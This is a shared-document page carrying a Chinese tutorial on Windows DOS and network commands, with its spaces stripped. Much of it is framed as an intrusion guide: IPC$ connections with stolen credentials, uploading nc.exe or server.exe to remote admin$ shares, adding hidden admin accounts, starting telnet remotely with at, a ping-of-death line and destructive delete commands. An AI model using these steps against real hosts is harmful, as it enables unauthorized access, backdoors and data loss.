dos命令Word格式.docx

上传人:b****5 文档编号:19861699 上传时间:2023-01-11 格式:DOCX 页数:43 大小:64.31KB
下载 相关 举报
dos命令Word格式.docx_第1页
第1页 / 共43页
dos命令Word格式.docx_第2页
第2页 / 共43页
dos命令Word格式.docx_第3页
第3页 / 共43页
dos命令Word格式.docx_第4页
第4页 / 共43页
dos命令Word格式.docx_第5页
第5页 / 共43页
点击查看更多>>
下载资源
资源描述

dos命令Word格式.docx

《dos命令Word格式.docx》由会员分享,可在线阅读,更多相关《dos命令Word格式.docx(43页珍藏版)》请在冰豆网上搜索。

dos命令Word格式.docx

这是一个用来查看网络状态的命令,操作简便功能强大。

-a查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。

这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。

用法:

netstat-aIP。

-r列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。

netstat-rIP。

四,tracert

跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。

如图5。

这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。

tracertIP。

五,net

这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。

首先让我们来看一看它都有那些子命令,键入net/?

回车如图6。

在这里,我们重点掌握几个入侵常用的子命令。

netview

使用此命令查看远程主机的所以共享资源。

命令格式为netview\\IP。

如图7。

netuse

把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。

命令格式为netusex:

\\IP\sharename。

上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。

下面表示和192.168.0.7建立IPC$连接(netuse\\IP\IPC$"

password"

/user:

"

name"

),如图8。

建立了IPC$连接后,呵呵,就可以上传文件了:

copync.exe\\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。

netstart

使用它来启动远程主机上的服务。

当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?

就使用这个命令来启动吧。

netstartservername,如图9,成功启动了telnet服务。

netstop

入侵后发现远程主机的某个服务碍手碍脚,怎么办?

利用这个命令停掉就ok了,用法和netstart同。

netuser

查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。

这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。

键入不带参数的netuser,可以查看所有用户,包括已经禁用的。

下面分别讲解。

1,netuserabcd1234/add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。

2,netuserabcd/del,将用户名为abcd的用户删除。

3,netuserabcd/active:

no,将用户名为abcd的用户禁用。

4,netuserabcd/active:

yes,激活用户名为abcd的用户。

5,netuserabcd,查看用户名为abcd的用户的情况,如图10。

netlocalgroup

查看所有和用户组有关的信息和进行相关操作。

键入不带参数的netlocalgroup即列出当前所有的用户组。

在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。

netlocalgroupgroupnameusername/add,如图11。

现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用netuserabcd来查看他的状态,和图10进行比较就可以看出来。

但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。

现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。

有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。

nettime

这个命令可以查看远程主机当前的时间。

如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。

但简单的入侵成功了,难道只是看看吗?

我们需要进一步渗透。

这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。

nettime\\IP。

如图12。

六,at

这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道nettime的重要了吧?

)。

当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。

attimecommand\\computer。

如图13。

表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里netstarttelnet即为开启telnet服务的命令)。

七,ftp

大家对这个命令应该比较熟悉了吧?

网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。

现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?

下面就给出基本的ftp命令使用方法。

首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入“help”来查看帮助(任何DOS命令都可以使用此方法查看其帮助),如图14。

大家可能看到了,这么多命令该怎么用?

其实也用不到那么多,掌握几个基本的就够了。

首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open主机IPftp端口”回车即可,一般端口默认都是21,可以不写。

接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍,如图15。

用户名和密码都是ftp,密码是不显示的。

当提示****loggedin时,就说明登陆成功。

这里因为是匿名登陆,所以用户显示为Anonymous。

接下来就要介绍具体命令的使用方法了,如图16。

dir跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。

cd进入某个文件夹。

get下载文件到本地机器。

put上传文件到远程服务器。

这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么利用就不多说了,大家就自由发挥去吧。

delete删除远程ftp服务器上的文件。

这也必须保证你有可写的权限。

bye退出当前连接。

quit同上。

八,telnet

功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。

为什么?

它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来干你想干的一切了。

下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息,如图17。

然后在提示符下键入openIP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的,如图18。

当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了,如图19。

这里我使用的超级管理员权限登陆的

见到网络上,觉得值得学习,特此收藏到这里,因为我几乎天天来这个网站 

netuse\\ip\ipc$"

"

建立IPC空链接 

密码"

用户名"

建立IPC非空链接 

netuseh:

\\ip\c$"

直接登陆后映射对方C:

到本地为H:

\\ip\c$登陆后映射对方C:

netuse\\ip\ipc$/del删除IPC链接 

/del删除映射对方到本地的为H:

的映射 

netuser用户名 密码 /add建立用户 

netuserguest/active:

yes激活guest用户 

netuser查看有哪些用户 

netuser帐户名查看帐户的属性 

netlocalgroupadministrators用户名/add把"

用户"

添加到管理员中使其具有管理员权限,注意:

administrator后加s用复数 

netstart查看开启了哪些服务 

netstart服务名 开启服务;

(如:

netstarttelnet,netstartschedule) 

netstop服务名停止某服务 

nettime\\目标ip查看对方时间 

nettime\\目标ip/set设置本地计算机时间与"

目标IP"

主机的时间同步,加上参数/yes可取消确认信息 

netview查看本地局域网内开启了哪些共享 

netview\\ip查看对方局域网内开启了哪些共享 

netconfig显示系统网络设置 

netlogoff断开连接的共享 

netpause服务名暂停某服务 

netsendip"

文本信息"

向对方发信息 

netver局域网内正在使用的网络连接类型和信息 

netshare查看本地开启的共享 

netshareipc$开启ipc$共享 

netshareipc$/del删除ipc$共享 

netsharec$/del删除C:

共享 

netuserguest12345用guest用户登陆后用将密码改为12345 

netpassword密码更改系统登陆密码 

netstat-a查看开启了哪些端口,常用netstat-an 

netstat-n查看端口的网络连接情况,常用netstat-an 

netstat-v查看正在进行的工作 

netstat-p协议名例:

netstat-ptcq/ip查看某协议使用情况(查看tcp/ip协议使用情况) 

netstat-s查看正在使用的所有协议使用情况 

nbtstat-Aip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:

参数-A要大写 

tracert-参数ip(或计算机名)跟踪路由(数据包),参数:

-w数字"

用于设置超时间隔。

pingip(或域名)向对方主机发送默认大小为32字节的数据,参数:

-l[空格]数据包大小"

-n发送数据次数"

-t"

指一直ping。

ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 

ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数"

/all"

显示全部配置信息 

tlist-t以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 

kill-F进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 

del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。

例如"

DEL/AR*.*"

表示删除当前目录下所有只读文件,"

DEL/A-S*.*"

表示删除当前目录下除系统文件以外的所有文件 

#2二:

del/S/Q目录或用:

rmdir/s/Q目录/S删除目录及目录下的所有子目录和文件。

同时使用参数/Q可取消删除操作时的系统确认就直接删除。

(二个命令作用相同) 

move盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 

fcone.txttwo.txt>

3st.txt对比二个文件并把不同之处输出到3st.txt文件中,"

>

和"

>

是重定向命令 

atid号开启已注册的某个计划任务 

at/delete停止所有计划任务,用参数/yes则不需要确认就直接停止 

atid号/delete停止某个已注册的计划任务 

at查看所有的计划任务 

at\\iptime程序名(或一个命令)/r在某时间运行对方某程序并重新启动计算机 

fingerusername@host查看最近有哪些用户登陆 

telnetip端口远和登陆服务器,默认端口为23 

openip连接到IP(属telnet登陆后的命令) 

telnet在本机上直接键入telnet将进入本机的telnet 

copy路径\文件名1 路径\文件名2/y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 

copyc:

\srv.exe\\ip\admin$复制本地c:

\srv.exe到对方的admin下 

cppy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:

2st.txt文件头要空三排,参数:

/b指二进制文件,/a指ASCLL格式文件 

copy\\ip\admin$\svv.exec:

\或:

copy\\ip\admin$\*.*复制对方admini$共享下的srv.exe文件(所有文件)至本地C:

xcopy要复制的文件或目录树 目标地址\目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件 

tftp-i自己IP(用肉机作跳板时这用肉机IP)getserver.exec:

\server.exe登陆后,将"

IP"

的server.exe下载到目标主机c:

\server.exe参数:

-i指以二进制模式传送,如传送exe文件时用,如不加-i则以ASCII模式(传送文本文件模式)进行传送 

tftp-i对方IP putc:

\server.exe登陆后,上传本地c:

\server.exe至主机 

ftpip端口用于上传文件至服务器或进行文件操作,默认端口为21。

bin指用二进制方式传送(可执行文件进);

默认为ASCII格式传送(文本文件时) 

routeprint显示出IP路由,将主要显示网络地址Networkaddres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interface 

arp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。

arp-a将显示出全部信息 

start程序名或命令/max或/min新开一个新窗口并最大化(最小化)运行某程序或命令 

mem查看cpu使用情况 

attrib文件名(目录名)查看某文件(目录)的属性 

attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存档,只读,系统,隐藏属性;

用+则是添加为某属性 

dir查看文件,参数:

/Q显示文件及目录属系统哪个用户,/T:

C显示文件创建时间,/T:

A显示文件上次被访问时间,/T:

W上次被修改时间 

date/t、time/t使用此参数即"

DATE/T"

、"

TIME/T"

将只显示当前日期和时间,而不必输入新日期和时间 

set指定环境变量名称=要指派给变量的字符设置环境变量 

set显示当前所有的环境变量 

setp(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量 

pause暂停批处理程序,并显示出:

请按任意键继续.... 

if在批处理程序中执行条件处理(更多说明见if命令及变量) 

goto标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:

start"

标签) 

call路径\批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call/?

) 

for对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) 

echoon或off打开或关闭echo,仅用echo不加参数则显示当前echo设置 

echo信息在屏幕上显示出信息 

echo信息>

pass.txt将"

信息"

保存到pass.txt文件中 

findstr"

Hello"

aa.txt在aa.txt文件中寻找字符串hello 

find文件名查找某文件 

title标题名字更改CMD窗口标题名字 

color颜色值设置cmd控制台前景和背景颜色;

0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 

prompt名称更改cmd.exe的显示的命令提示符(把C:

\、D:

\统一改为:

EntSky\) 

#3三:

ver在DOS窗口下显示版本信息 

winver弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) 

format盘符/FS:

类型格式化磁盘,类型:

FAT、FAT32、NTFS,例:

FormatD:

/FS:

NTFS 

md 目录名创建目录 

replace源文件 要替换文件的目录替换文件 

ren原文件名 新文件名重命名文件名 

tree以树形结构显示出目录,用参数-f将列出第个文件夹中文件名称 

type文件名显示文本文件的内容 

more文件名逐屏显示输出文件 

doskey要锁定的命令=字符 

doskey要解锁命令=为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。

如:

锁定dir命令:

doskeydir=entsky(不能用doskeydir=dir);

解锁:

doskeydir= 

taskmgr调出任务管理器 

chkdsk/FD:

检查磁盘D并显示状态报告;

加参数/f并修复磁盘上的错误 

tlntadmntelnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 

exit退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe 

path路径\可执行文件的文件名为可执行文件设置一个路径。

cmd启动一个win2K命令解释窗口。

参数:

/eff、/en关闭、开启命令扩展;

更我详细说明见cmd/?

regedit/s注册表文件名导入注册表;

参数/S指安静模式导入,无任何提示;

regedit/e注册表文件名导出注册表 

cacls文件名 参数显示或修改文件访问控制列表(ACL)——针对NTFS格式时。

/D用户名:

设定拒绝某用户访问;

/P用户名:

perm替换指定用户的访问权限;

/G用户名:

perm赋予指定用户访问权限;

Perm可以是:

N无,R读取,W写入,C更改(写入),F完全控制;

例:

caclsD:

\test.txt/Dpub设定d:

\test.txt拒绝pub用户访问。

cacls文件名查看文件的访问用户权限列表 

REM文本内容在批处理文件中添加注解 

netsh查看或更改本地网络配置情况 

#4四:

IIS服务命令:

iisreset/reboot重启win2k计算机(但有提示系统将重启信息出现) 

iisreset/start或stop启动(停止)所有Internet服务 

iisreset/restart停止然后重新启动所有Internet服务 

iisreset/status显示所有Internet服务状态 

iisreset/enable或disable在本地系统上启用(禁用)Internet服务的

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 法律文书 > 调解书

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1